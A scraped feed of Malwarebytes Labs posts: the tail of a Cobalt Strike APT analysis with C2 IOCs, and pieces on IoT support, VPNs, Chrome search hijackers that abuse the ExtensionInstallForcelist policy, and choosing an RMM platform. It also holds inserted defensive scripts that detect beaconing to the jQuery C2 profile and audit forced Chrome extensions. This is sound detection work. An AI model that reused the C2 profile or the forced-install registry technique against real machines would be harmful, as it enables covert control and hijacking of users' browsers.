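As an added detection example (not part of the original analysis), the periodic beaconing to the jQuery-profile URI can be spotted in proxy logs by grouping requests per client, host and URI and measuring how regular the request intervals are. The log format, the CDN allowlist, and the count and jitter thresholds are assumptions for this example; the sample lines are constructed, using the C2 hostname and the two URIs named above.

```python
"""Flag low-jitter beaconing to Cobalt Strike jQuery-profile URIs in proxy logs (added example)."""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# URI paths of the public jQuery Malleable C2 profile, as seen in this campaign.
JQUERY_PROFILE_URIS = {"/jquery-3.3.1.min.js", "/jquery-3.3.1.slim.min.js"}

# Hosts that legitimately serve jQuery; anything else serving these paths deserves a look.
# (Assumed allowlist; extend it with the CDNs your environment actually uses.)
KNOWN_JQUERY_CDNS = {"code.jquery.com", "ajax.googleapis.com", "cdnjs.cloudflare.com"}

# Assumed log layout: ISO timestamp, client IP, host, method, URI, status, bytes.
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<host>\S+) (?P<method>\S+) "
    r"(?P<uri>\S+) (?P<status>\d{3}) (?P<bytes>\d+)$"
)

# Constructed sample: one client beacons every ~60 s to the C2, plus benign CDN traffic.
SAMPLE_LOG = """\
2020-06-10T12:00:00 10.0.0.5 time.updateeset.com GET /jquery-3.3.1.slim.min.js 200 80215
2020-06-10T12:00:00 10.0.0.5 time.updateeset.com GET /jquery-3.3.1.min.js 200 5120
2020-06-10T12:01:02 10.0.0.5 time.updateeset.com GET /jquery-3.3.1.min.js 200 5120
2020-06-10T12:01:59 10.0.0.5 time.updateeset.com GET /jquery-3.3.1.min.js 200 5120
2020-06-10T12:02:10 10.0.0.7 code.jquery.com GET /jquery-3.3.1.min.js 200 86927
2020-06-10T12:03:01 10.0.0.5 time.updateeset.com GET /jquery-3.3.1.min.js 200 5120
2020-06-10T12:04:00 10.0.0.5 time.updateeset.com GET /jquery-3.3.1.min.js 200 5120
2020-06-10T12:05:03 10.0.0.5 time.updateeset.com GET /jquery-3.3.1.min.js 200 5120
2020-06-10T12:09:44 10.0.0.7 code.jquery.com GET /jquery-3.3.1.min.js 200 86927
"""


def parse_log(lines):
    """Parse log lines into dicts; lines that do not match the layout are skipped."""
    events = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        d["ts"] = datetime.fromisoformat(d["ts"])
        d["bytes"] = int(d["bytes"])
        events.append(d)
    return events


def find_beacons(events, min_requests=5, max_jitter=0.2):
    """Return (client, host, uri) groups that hit a profile URI on a non-CDN host at regular intervals.

    Regularity is measured as the coefficient of variation of the inter-request gaps;
    a Cobalt Strike beacon with a small jitter setting scores well under the threshold.
    """
    groups = defaultdict(list)
    for e in events:
        groups[(e["client"], e["host"], e["uri"])].append(e["ts"])
    findings = []
    for (client, host, uri), stamps in groups.items():
        if uri not in JQUERY_PROFILE_URIS or host in KNOWN_JQUERY_CDNS:
            continue
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_jitter:
            findings.append({
                "client": client, "host": host, "uri": uri,
                "requests": len(stamps),
                "mean_interval_s": round(mean, 1),
                "jitter": round(cv, 3),
            })
    return findings


def scan_sample():
    return find_beacons(parse_log(SAMPLE_LOG.splitlines()))


if __name__ == "__main__":
    for finding in scan_sample():
        print(finding)
```

The single request for the slim file (the stage-2 download) is not enough on its own to trip the count threshold; it is the repeated, evenly spaced polling of the non-slim URI from the same client that makes the group stand out, and the same grouping logic works for any other profile URI you add to the set.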

Using Hollows Hunter we were able to extract the final payload, which is Cobalt Strike, from ecmd’s memory space.


A precise attribution of this attack is a work in progress but here we provide some insights into who might be behind this attack. Our analysis showed that the attackers excluded Russia and the US. The former could be a false flag, while the latter may be an effort to avoid the attention of US malware analysts.

As mentioned before, the domain hosting the remote template is registered in Hong Kong while the C2 domain “time.updateeset[.]com” was registered under the name of an Iranian company called Ehtesham Rayan on Feb 29, 2020. The company used to provide AV software and is seemingly closed now. However, these are not strong or reliable indicators for attribution.

Figure 11: whois registration information

In terms of TTPs used, Chinese APT groups such as Mustang Panda and APT41 are known to use jQuery and the Malleable C2 feature of Cobalt Strike. Specifically, the latest campaign of Mustang Panda has used the same Cobalt Strike feature with the same jQuery profile to download the final payload which is also Cobalt Strike. This is very similar to what we saw in this campaign, however the initial infection vector and first payload are different in our case.


Anadia Waleed resume.doc

Remote Template: indexa.dotm

Remote Template Url:




cf.ini shellcode after decryption:

Cobalt Strike downloaded shellcode:

Cobalt Strike payload

The post Multi-stage APT attack drops Cobalt Strike using Malleable C2 feature appeared first on Malwarebytes Labs.

Categories: Malware Bytes

End of line: supporting IoT in the home

Malware Bytes Security - Wed, 06/17/2020 - 11:30am

Trouble is potentially brewing in Internet of Things (IoT) land, even if the consequences may still be a little way off. System updates and issues surrounding expiring certificates will pose problems for manufacturers and headaches for consumers.

System updates for fun and profit

One of the first mainstream collisions of putting updates out to pasture and angry device owners yelling “Why doesn’t this work anymore” was probably at the tail end of 2019 and involved streaming giant Netflix. If you have internet connected devices, then those devices will require updating. It may be a security issue, it could be a UI redesign, perhaps the code deep down in the guts between the backend and what you see in front of you has had a change cascading its way through how everything operates.

People realised this very quickly when Netflix started letting people know their TVs would no longer work quite how they had previously. This approach makes sense; there’s only so much you can do with older bits and pieces of hardware with regard to the ever-present march of the new. At some point, it simply won’t be able to cut the mustard and then (best case scenario) you’re having to fall back on third party apps instead of official solutions. That could end up being a security risk all by itself.

Not so smart device?

White goods like fridges, freezers, and more general kitchen equipment around the home, are usually pretty expensive. Devices with IoT tech in them, even more so. You’re paying a premium for functionality you may not use that often. It’s likely some folks buy IoT devices for the home without even knowing they possess said capability. It’d certainly go some way to explaining why so many of these things are found online, unsecured, with no password (or a fixed password easily Googled).

Into this hot mess steps a number of expectations; primary among them, how long you can expect the device to be supported. We’re not talking about apps allowing you to perform smaller tasks now, so much as we are raising expectations about core functionality. Namely: how long will manufacturers ensure our IoT device, all hooked up to the big wide web, keeps ticking over? Not only in terms of “does it work”, but also “is it still secure?”

As always, the devil is in the details (or at least some additional information).

Mapping out the end times

Planned obsolescence is something that’s been around in tech circles for years. The basic idea is to keep making money by building some form of limited shelf life into a device, in a way which makes you continually fork over cash above and beyond the original purchase…because you’re now onto the next one…and the one after that…and the latest model does a handful of new things, so you’d better buy that too…

You get the idea. Design cycles become shorter, new product releases are rushed out the door, potentially filled with bugs, leaving you to wonder if the new additions could’ve been included in the product you already own.

The addition of more new and intricate technology in white goods is arguably adding to the list of things which could break and/or go wrong over time. Reliance on the ever-shifting sands of the Internet also means things will simply go out of date a lot faster than if it were a plain old washing machine, tumble drier, or fridge.

It’s wise not to become too wrapped up in conspiracy theories on this subject; some caution is advised. By the same token, this is absolutely a thing that happens and major organisations have caught some heat for it.

Even so, we’re now at a point where IoT is firmly established in homes whether we like it or not. More of our devices are becoming internet connected; even if you purposely go out of your way to avoid it, chances are you’ll begrudgingly get stuck with it at some point. For most people in that situation, it tends to end up being a television set. However, the IoT sky is the limit and it could be pretty much anything, really.

Behold my impressive collection of legal documents

At this point, we’re at warranties and guarantees. These can differ greatly with regards to protection depending on where you live, but they are typically tied to laws relevant to your area. You’d think it’d be straightforward; in actual fact, it’s more along the lines of Cole Porter singing Anything Goes as he desperately tries to make sense of 600 pages of legalese.

More often than not, the extended warranty is what offers the most protection. It’s also the one which involves handing over more money, registering on the website, sending off a card, or just forgetting to do any of those previously mentioned then panicking when the toaster explodes.

With all the new IoT tech inside your washing machine, you may well be more likely to want extra protection in the event of things going wrong. One slight annoyance, Cole Porter yells from behind his impressive collection of legal documents: will that fancy extended 7-year warranty outlive the IoT tech in your fridge?

Going back to the above article, it’s all a bit worryingly vague. When asked how long support can be expected, answers range from “issued as required,” to “up to ten years,” and at least one vendor who said “a maximum of two years,” with the not massively reassuring caveat that support is not limited to two years.

Glad we’ve cleared that one up, then. Thanks, Cole.

As per the Which? report’s advice, you may have to start asking manufacturers exactly how long the IoT tech in a device will be supported versus the length your warranty runs for. Good luck.

Be certain with your certificates

SSL certificates help keep the web safe by firing up the old encryption cannon and ensuring everything you do is kept from prying eyes, be it regular browsing, online banking, gaming, or just streaming some TV shows. The problem is, lots of those certificates are due to expire in the next few years and all of those IoT devices in your home making use of them could be caught in the fallout.

Such a thing impacted users of Roku, who found an expiring certificate broke their service. More general warnings of certificate expiration peg the next big fallout sometime around the tail end of 2021. I, for one, am looking forward to the immense joy gleaned from being told by text that the SSL certificate on my fridge freezer has expired and I’ll have to fix it myself.
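An added example, not from the original post: a small inventory script that reports how many days remain on the certificate each host presents, so an expiring certificate on a home device is noticed before the service breaks. The host names in the built-in sample are constructed placeholders, the 30-day warning threshold is an assumption, and fetch_not_after is the only part that touches the network.

```python
"""Report days until TLS certificate expiry for a list of hosts (added example)."""
import socket
import ssl
from datetime import datetime, timezone


def days_until_expiry(not_after, now=None):
    """not_after is the 'notAfter' string from ssl.getpeercert(), e.g. 'Jun 17 11:30:00 2021 GMT'."""
    expires = datetime.fromtimestamp(ssl.cert_time_to_seconds(not_after), tz=timezone.utc)
    now = now or datetime.now(timezone.utc)
    return (expires - now).total_seconds() / 86400


def classify(days, warn_days=30):
    """Bucket a remaining-days value: expired, expiring (inside the warning window) or ok."""
    if days < 0:
        return "expired"
    if days < warn_days:
        return "expiring"
    return "ok"


def fetch_not_after(host, port=443, timeout=5.0):
    """Fetch the leaf certificate's notAfter from a live endpoint; returns (not_after, error).

    Verification is left on: a certificate that already failed validation (expired,
    self-signed, wrong name) is reported through the error string instead of a date.
    """
    ctx = ssl.create_default_context()
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                return tls.getpeercert().get("notAfter"), None
    except ssl.SSLCertVerificationError as exc:
        return None, exc.verify_message
    except OSError as exc:
        return None, str(exc)


def audit_hosts(hosts, fetch=fetch_not_after, warn_days=30, now=None):
    """Run the check for every host; 'fetch' is injectable so the logic can run offline."""
    report = []
    for host in hosts:
        not_after, error = fetch(host)
        if error or not not_after:
            report.append({"host": host, "status": "error", "detail": error or "no certificate"})
            continue
        days = days_until_expiry(not_after, now)
        report.append({"host": host, "status": classify(days, warn_days), "days_left": round(days, 1)})
    return report


# Constructed sample used when run offline; 'now' is pinned so the numbers are reproducible.
SAMPLE_NOW = datetime(2021, 12, 1, tzinfo=timezone.utc)
SAMPLE_CERTS = {
    "fridge.lan": ("Dec 31 00:00:00 2021 GMT", None),      # placeholder host, 30 days left
    "tv.lan": ("Jan 05 00:00:00 2021 GMT", None),          # placeholder host, long expired
    "router.lan": (None, "certificate has expired"),       # placeholder host, failed verification
}


def demo_report():
    return audit_hosts(list(SAMPLE_CERTS), fetch=lambda h: SAMPLE_CERTS[h], now=SAMPLE_NOW)


if __name__ == "__main__":
    import sys
    hosts = sys.argv[1:]
    for row in (audit_hosts(hosts) if hosts else demo_report()):
        print(row)
```

Run it with host names as arguments to query real devices; without arguments it prints the constructed sample. Devices that present a self-signed certificate will show up as errors rather than dates, which is itself worth knowing before the next expiry wave.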

A televisual turning point

With all of the above becoming things for a harried shopper to consider, it’s worth remembering that the smart in some devices gives manufacturers additional valuable data on people buying their things. I hope you like adverts the moment you fire up your TV, or the big box in your front room watching pretty much everything you do related to it.

It’s in their interest to push digital into as many devices as possible, and manufacturers already claim that stripping the previously not-included smart tech from devices would make said devices more expensive. Put simply: it isn’t going away anytime soon.

Warranties which may not warranty, certificates which might fail to certify, lifespans which don’t match the length of cover promised, and data harvested from advertisements to try and upsell more smart tech. That’s the current lie of the land when you next go out to replace that 5-year-old fridge in need of patching up.

Should you figure it out, please let us know – I think we’d all appreciate the helping hand.

The post End of line: supporting IoT in the home appeared first on Malwarebytes Labs.

Categories: Malware Bytes

VPNs: should you use them?

Malware Bytes Security - Tue, 06/16/2020 - 11:30am

We are going to talk today about something you’ve likely heard of before: VPNs, or Virtual Private Networks. We at Malwarebytes have delved into these tools in greater depth, and we’ve literally discussed them on the digital airwaves.

But we want to answer a question we’ve been getting more and more. Folks aren’t as curious about what a VPN is anymore, as they are about whether they should use one.

The answer is: it depends. For that, we’re here to help.

How a VPN works

To understand how a VPN works and whether you should use one, it is best to first understand what happens when you’re browsing the Internet. Whenever you open up a web browser and go to a website, you’re connecting to that website and exchanging information with it. This is your Internet “traffic,” and it can reveal quite a bit of information about you, including what websites you visit, your IP address, and more.

A VPN acts like a “tunnel” for your Internet traffic. Your traffic goes into the tunnel, and emerges out of one of the exit nodes of the VPN service. The tunnel encrypts your data, making it undecipherable to your Internet Service Provider (ISP). At best, your ISP can see that some encrypted traffic is going to a VPN service, but not the contents of that traffic, and not where it comes out of.

The interesting thing to note here is that, with this basic functionality, a VPN can actually serve many different needs. As we wrote before:

Depending on who you ask, a VPN is any and all of these: [1] a tunnel that sits between your computing device and the Internet, [2] helps you stay anonymous online, preventing government surveillance, spying, and excessive data collection of big companies, [3] a tool that encrypts your connection and masks your true IP address with one belonging to your VPN provider, [4] a piece of software or app that lets you access private resources (like company files on your work intranet) or sites that are usually blocked in your country or region.

Without a VPN, your Internet Service Provider, or ISP, can see almost everything you interact with online. Who you connect to, what type of traffic, where you are geographically. No bueno.

Obscuring your traffic with a VPN

If you use a VPN, your ISP knows you’ve connected to a VPN, but it cannot inspect the content of your traffic, and does not know where it comes out at the other end.

Also, despite the recent surge in popularity for VPNs, these tools have been in use for businesses for a long time now. They are typically used to access resources remotely as if you were at the office.

In some cases we have even seen performance boosts by using a VPN, where artificial throttling is circumvented by the use of a VPN. Because you’re tunneling your connection, your ISP can’t peek at your traffic and throttle it, based on the kind of traffic. Believe it or not, this is a real issue, and some ISPs throttle users’ traffic when they see file sharing for example.

Consumer recommendations

There are several paths you can take when deciding to implement a VPN. Not only do these tools work on your personal devices like your laptops and mobile phones, but, in some cases, you can insert your own router into the mix.

In many cases, the router provided by your ISP is not a device that you fully control, and using it for your networking needs might open you to possible security issues.

These devices sometimes have administrative functions that aren’t accessible to subscribers. Some mid to higher range routers offered on the market today allow you to put the VPN on the router, effectively encapsulating all your traffic.

The hardware route

A possible solution would be to get such a router and install the VPN on it, rather than on your individual machines. This has the added bonus that it provides VPN protection to devices that don’t support VPNs, like handhelds, consoles, and smart devices.

In the past, we have seen ISP hardware breached by hard coded accounts on the modem/routers they offer to their subscribers.

Sadly, ISP customer support often balks at helping out if you insert your own equipment in the mix. (In fact, they might make you remove it from the equation before they’ll provide support.)

This solution is specific to each router, and a bit more advanced.

The software route

You can also use a VPN application provided by the VPN provider. This application will provide VPN tunneling to the computer it is installed on, and only that, so keep that in mind.

One of the strongest options to consider for your software solution is a “kill switch” functionality. This ensures that if anything happens to the VPN application, it doesn’t “fail open” or allow internet traffic through if the VPN is broken. Think about it. You’re installing this application for the explicit functionality that it can tunnel your traffic. If the app malfunctions, there might be privacy risks in the app still allowing you to connect to the Internet, but letting your traffic go un-tunneled.

More than anything, a kill switch prevents the chance that you’re operating with a false sense of security. What you say online, and the chance that it was you who said it, can draw attention in some countries with far stricter laws on free speech.

Another factor that makes a VPN really perform is having a lot of exit nodes. These exit nodes are locations that can be used to circumvent geolocation. The more that are available, and the greater the variety, the more versatile and useful the VPN service is.

Speed is also a factor for VPN exit nodes. There’s not much point in having a ton of exit nodes unless they’re fast. One of the drawbacks of using a VPN is that by adding all these “hops” between nodes, your traffic will take longer to route. If the nodes are reasonably fast, the end user shouldn’t notice significant slowdowns.

You should have a VPN provider that doesn’t discriminate by the type of traffic that flows through their network. Some smaller VPNs don’t have the necessary infrastructure to handle large volumes of peer-to-peer or BitTorrent traffic, and either ban it outright or impose data caps.

Final thoughts

Remember, when you’re thinking about adopting one of these tools, you’re transferring trust: when you use a VPN you hand access to your traffic to a third party, the VPN provider. All the visibility that users balk at relinquishing to their ISP has now been handed over to their VPN provider. Careful consideration should be given to the trustworthiness of said VPN provider.

There are documented cases where a VPN provider revealed that their users could be de-anonymized and that the VPN provider did in fact keep logs and was willing to turn them over.

Remember, VPNs should not be viewed as shadowy tools. They are, in all actuality, business and privacy tools. They let the researchers who fight malware find out what that malware actually does. They let employees connect to company resources away from the office—which is of the utmost importance today. And they allow you, the user, to reclaim a measure of privacy.

It is therefore important to choose carefully. Most VPNs offer a service where they promise not to log or inspect your traffic. In many cases, though, this claim is impossible to verify.

The best option for VPNs, then? Read reviews, scour forums, and look for the functionalities that are important, specifically, to you. You may find what you’re looking for just around the corner.

The post VPNs: should you use them? appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (June 8 – 14)

Malware Bytes Security - Mon, 06/15/2020 - 11:30am

Last week on Malwarebytes Labs, we looked into nasty search hijackers that worried a lot of Chrome users; a list of considerations for MSPs when looking for an RMM platform; the complaint faced by ParetoLogic, the company that issues SpeedyPC, a product that claims to find and remove various PC errors; and a ransomware attack that affected car manufacturers like Honda and Enel.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (June 8 – 14) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Search hijackers change Chrome policy to remote administration

Malware Bytes Security - Thu, 06/11/2020 - 11:30am

The latest type of installer in the saga of search hijacking changes a Chrome policy which tells users it can’t be removed because the browser is managed from the outside.

As you can imagine, that has freaked out quite a few Chrome users.

We have talked about the search hijacker’s business model in detail. Suffice to say, it is a billion-dollar industry and a lot of search hijackers want a piece of this action as even a small portion can amount to a hefty income.

A single search hijacker doesn’t generate large amounts of cash for threat actors the way ransomware or banking Trojans do. So, the publishers are always looking for ways to get installed on large numbers of systems and stay installed for as long as possible.

It also should not come as a surprise that ethics are no priority for many of them. As long as they can rake in their redirect fees, they couldn’t care less about your inconvenience of being stuck with a default search provider that you would not have picked yourself.

What have they done this time?

We were alerted by some of our customers who said they were unable to remove Chrome extensions as they ran into this restriction:

Basically, this is telling the user that the browser may be managed outside of Chrome and the administrator has installed an extension. Even users that have Administrator accounts on the affected systems are unable to remove these extensions.

The extension in question is easily spotted in an overview of all the installed extensions as it is the one that has no “Remove” option.

There is no “Remove” button for the spotted search hijacker

We have found several of these search hijackers in the Chrome webstore but installing them from there does not lead to the “managed browser symptoms.” It takes a Windows installer to make the necessary registry changes, so users that installed it from the webstore should be able to remove it themselves in the normal way.

Installed from the webstore the extensions have a “Remove” button

What all the hijackers that use the managed browser technique have in common is that they add the registry keys:

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Chromium\ExtensionInstallForcelist

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist

under which the forced extensions are enumerated as registry values like this:

"1"="REG_SZ", "lpfpbajbnhddlpljjnfndngbkkfkjfna;"

The description in the Chromium documentation about the ExtensionInstallForcelist states:

Specifies a list of apps and extensions that are installed silently, without user interaction, and which cannot be uninstalled nor disabled by the user.
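Added example (written here; it is not Malwarebytes tooling): an audit of the ExtensionInstallForcelist values. It reads a standard .reg export of the two policy keys above (or the live registry on Windows via winreg), validates each entry’s extension ID, and matches it against the three extension identifiers listed in this post. In the constructed sample, the second extension ID and the SomeOtherPolicy key are placeholders; the Chrome Web Store update URL is the real default.

```python
"""Audit Chrome/Chromium ExtensionInstallForcelist policy values (added example)."""
import re
import sys

FORCELIST_KEYS = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Chromium\ExtensionInstallForcelist",
)

# Extension IDs named in the post, mapped to the family each was seen with.
KNOWN_HIJACKERS = {
    "fhmghdmcgkkdadabbnkmnejhoncccjio": "Capita",
    "lpfpbajbnhddlpljjnfndngbkkfkjfna": "SearchSpace",
    "fifailmmmlkdabfkkoejgffjdfgbieji": "Mazy",
}

EXT_ID_RE = re.compile(r"^[a-p]{32}$")          # Chrome extension IDs: 32 chars from a-p
REG_LINE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<value>.*)"$')

# Constructed .reg export: one known hijacker, one placeholder ID, one unrelated key.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist]
"1"="lpfpbajbnhddlpljjnfndngbkkfkjfna;"
"2"="abcdefghijklmnopabcdefghijklmnop;https://clients2.google.com/service/update2/crx"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\SomeOtherPolicy]
"Unrelated"="1"
"""


def classify_entry(name, value):
    """A forcelist value is '<extension id>;<update url>'; an empty URL means the Web Store."""
    ext_id, _, update_url = value.partition(";")
    if not EXT_ID_RE.match(ext_id):
        verdict = "malformed"
    elif ext_id in KNOWN_HIJACKERS:
        verdict = "known_hijacker:" + KNOWN_HIJACKERS[ext_id]
    else:
        verdict = "review"   # any forced extension on a home PC deserves a look
    return {"value": name, "extension_id": ext_id,
            "update_url": update_url or "(Chrome Web Store default)", "verdict": verdict}


def audit_reg_export(text):
    """Walk a .reg export and classify every value under the two forcelist keys."""
    wanted = {k.lower() for k in FORCELIST_KEYS}
    findings, current_key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current_key = line[1:-1]
            continue
        if current_key is None or current_key.lower() not in wanted:
            continue
        m = REG_LINE_RE.match(line)
        if m:
            value = m.group("value").replace('\\"', '"').replace("\\\\", "\\")
            findings.append(dict(key=current_key, **classify_entry(m.group("name"), value)))
    return findings


def audit_live_registry():
    """On Windows, read the forcelist keys directly (no-op elsewhere: winreg is Windows-only)."""
    import winreg
    findings = []
    for key_path in FORCELIST_KEYS:
        sub = key_path.split("\\", 1)[1]
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, sub) as k:
                i = 0
                while True:
                    try:
                        name, value, _ = winreg.EnumValue(k, i)
                    except OSError:
                        break
                    findings.append(dict(key=key_path, **classify_entry(name, str(value))))
                    i += 1
        except FileNotFoundError:
            continue
    return findings


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-16" if sys.argv[1].endswith(".reg") else "utf-8") as fh:
            rows = audit_reg_export(fh.read())
    elif sys.platform == "win32":
        rows = audit_live_registry()
    else:
        rows = audit_reg_export(SAMPLE_REG)
    for row in rows:
        print(row)
```

Exports written by regedit are UTF-16, which is why the command-line path decodes .reg files that way. Note that a value under these keys is exactly what makes Chrome show the “managed” notice, so an empty result on a machine that still displays it points at another policy source (for instance the HKEY_CURRENT_USER hive or a cloud-managed profile) rather than at a clean system.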

How do these hijackers land on victims’ systems?

We are not completely sure, but we did manage to round up some stand-alone installers from the Temp folder on affected Windows systems. And it looks as if these installers were part of a bundler.

What victims will typically see is an installer notice like this one:

and then nothing until they open Chrome and see this new tab:

and the “your browser is managed by a remote administrator” type of comment scattered throughout the Chrome menu and settings.

Search hijackers in general

Search hijackers come in different flavors. Basically, they can be divided into three main categories if you look at their methodology:

  • The hijacker redirects victims to the best paying search engine.
  • The hijacker redirects victims to their own site and shows additional sponsored ads.
  • The hijacker redirects victims to a popular search engine after inserting or replacing sponsored ads.

By far the most common vehicles are browser extensions, whether they are called extensions, add-ons, or browser helper objects. But you will see different approaches here as well:

  • The extension lets the hijacker take over as the default search engine.
  • The extension takes over as “newtab” and shows a search field in that tab.
  • The extension takes permission to read and change your data on websites. It uses these permissions to alter the outcome of the victim’s searches.

This family is of the kind that uses their own site as a redirect to the search engine they get paid by, and the extension takes over as default search engine. The default is the one that gets queried when the user searches from the address bar.


Malwarebytes recognizes these hijackers and removes them from affected systems. You can find a few removal guides on our forums:

Removal guide for Mazy Search

Removal guide for SearchSpace

And at the rate they are pushing out new ones, more will probably follow.


Extension identifiers

fhmghdmcgkkdadabbnkmnejhoncccjio (Capita)

lpfpbajbnhddlpljjnfndngbkkfkjfna (search space)

fifailmmmlkdabfkkoejgffjdfgbieji (Mazy)
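The forced-install policy described above leaves a trace that an administrator can audit directly. The PowerShell below is an added example, not code from the Malwarebytes post: it reads the ExtensionInstallForcelist values from the documented Chrome policy keys under HKLM and HKCU, splits each value into the extension ID and its update URL, and flags any of the three IDs listed in this post. It only reports; it does not change anything.

```powershell
# Added example (not from the Malwarebytes post): audit Chrome's ExtensionInstallForcelist
# policy for the search-hijacker extension IDs named in the article.
# The registry paths are the documented Chrome policy locations; the IDs come from the post.
$KnownHijackerIds = @{
    'fhmghdmcgkkdadabbnkmnejhoncccjio' = 'Capita'
    'lpfpbajbnhddlpljjnfndngbkkfkjfna' = 'SearchSpace'
    'fifailmmmlkdabfkkoejgffjdfgbieji' = 'Mazy'
}

$PolicyPaths = @(
    'HKLM:\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist',
    'HKCU:\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist'
)

function Get-ForcedChromeExtension {
    [CmdletBinding()]
    param([string[]]$Path = $PolicyPaths)

    foreach ($p in $Path) {
        if (-not (Test-Path -LiteralPath $p)) { continue }
        $key = Get-Item -LiteralPath $p
        foreach ($name in $key.GetValueNames()) {
            # Each policy value has the form "<extension id>;<update url>".
            $raw   = [string]$key.GetValue($name)
            $parts = $raw -split ';', 2
            $id    = $parts[0].Trim()
            $url   = if ($parts.Count -gt 1) { $parts[1].Trim() } else { '' }
            $match = if ($KnownHijackerIds.ContainsKey($id)) { $KnownHijackerIds[$id] } else { $null }

            [pscustomobject]@{
                PolicyPath    = $p
                ValueName     = $name
                ExtensionId   = $id
                UpdateUrl     = $url
                KnownHijacker = $match
            }
        }
    }
}

$forced = @(Get-ForcedChromeExtension)
if ($forced.Count -eq 0) {
    'No ExtensionInstallForcelist policy values found; Chrome is not force-installing extensions.'
} else {
    # Any value here means the browser shows the "managed by your organization" notice.
    $forced | Format-Table PolicyPath, ValueName, ExtensionId, UpdateUrl, KnownHijacker -AutoSize
    $hits = @($forced | Where-Object { $_.KnownHijacker })
    if ($hits.Count -gt 0) {
        $names = ($hits | ForEach-Object { $_.KnownHijacker } | Sort-Object -Unique) -join ', '
        Write-Warning "Forced extension(s) matching known search hijackers: $names"
    }
}
```

On a machine that is not domain-managed, any entry under these keys deserves a second look, since a legitimate enterprise policy is normally delivered by Group Policy rather than by an installer dropping values into the registry. The script reports only; removal of the extension and policy value is left to the tooling described in the post.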


Stay safe everyone!

The post Search hijackers change Chrome policy to remote administration appeared first on Malwarebytes Labs.

Categories: Malware Bytes

MSPs, know what you’re really looking for in an RMM platform

Malware Bytes Security - Wed, 06/10/2020 - 11:30am

MSPs naturally adapt and mature as innovative technologies and more effective processes are introduced into the industry. But with ransomware cyberattacks happening left and right, pushing them to evolve even further, MSPs are left with no choice but to go with the flow. Going for improved functionalities—although important—is simply no longer enough. MSPs must begin putting a lot of emphasis on improving their security for the continuous protection of their most valuable assets.

With ransomware threat actors exploiting weaknesses in remote monitoring and management (RMM) platforms to get into endpoints by the thousands, MSPs have found themselves wondering whether their platform is secure, robust, and agile enough for the changing threat landscape. To help them decide, let us look at the key points to consider when choosing an RMM that is right for them.

Helping MSPs look for “the one”

Indeed, there is no “one-size-fits-all” RMM platform. Every MSP has its own unique needs, and vendors must meet those needs so both can deliver high quality service and grow together as one.

Whether you’re an experienced MSP who is evaluating your current RMM or contemplating switching to another vendor, or you’re a new MSP who is on the lookout for an RMM platform that best fits your unique business needs, we offer you a guide in finding “the one.”


Ask: “Does this RMM vendor take security seriously as much as we do?”

A security-conscious MSP looks for security in an RMM vendor’s product. This should be a necessity, as the MSP’s business is at stake, especially for an MSP that handles all of its clients’ data. It is only logical to look for a vendor that cares about the security of its clients’ assets the same way you, the MSP, care about the assets of your clients.

MSPs can start assessing security by checking whether the communication between entities is secure. For example, are endpoints communicating securely with the monitoring server? Is the monitoring server communicating securely with remote management devices/systems? Overall, does the RMM take a layered approach to secured communication between devices and apps, which in turn protects the entire support chain?

Another point to think about is whether the platform provides multiple security role assignments for various kinds of users. Certain users can only have read-only access, for example, while others are granted higher privileges based on their job functions.

We cannot stress enough the importance of MSPs securing themselves to keep their clients safe from online attacks like ransomware. Being consistent in this regard on every facet of the decision-making process will only put MSPs at a significant advantage.


Ask: “Does this RMM adapt to new demands and scale really well with the changing trends?”

RMM platforms and solutions aren’t something new. In fact, some of them have been around for decades. With this in mind, MSPs should look at how much the RMM has changed since it first offered its service, what it has done so far to keep up with the ever-changing business landscape, and how it plans to evolve for the future.

Legacy RMMs were never created with the modern MSP, thousands upon thousands of endpoints to support, and the Internet of Things (IoT) in mind. There are far better designed RMMs today that are built to deliver robust, multi-tenant solutions for MSPs—meaning the ability to manage multiple disparate clients and/or manage access to multiple applications for various clients using a single application or platform. RMMs that offer these are foreseen as best positioned for the future. It is, therefore, paramount for MSPs to partner with a vendor that scales well with market demand and doesn’t hold them back when it comes to their own business growth.

Proactive, with the drive for change

Ask: “Does the RMM vendor provide proactive patching and show momentum in improving?”

Not only should MSPs look for an RMM that has a long-term product roadmap and regularly releases updates for it, but they should also look at how their current or potential vendor goes about actively [1] monitoring the threat landscape and [2] looking for flaws in its own software before the bad guys have time to learn about them and create an exploit.

MSPs have realized that reacting to cyberattacks doesn’t work. And while it is admirable for an RMM vendor to be able to determine a security flaw and patch it as quickly as they can to mitigate infection, preventing something big from happening far outweighs mitigating what has already happened.

Apart from patching, a good RMM vendor must also show that it is continuously improving its products by adding more helpful functionalities, enhancing what’s most used, and doing away with whatever is not beneficial for MSPs.

Ease of use

Ask: “How easily can my employees use this platform?”

MSPs look for software that not only gets the job done but is also easy to operate. Aesthetics (a better designed interface) combined with functionality come into play here. The UI must be easy to understand and navigate, and each bit of what is shown should give technicians a clear idea of what they want to know about their endpoints. Furthermore, it must allow MSPs to customize the tool to fit their business needs.

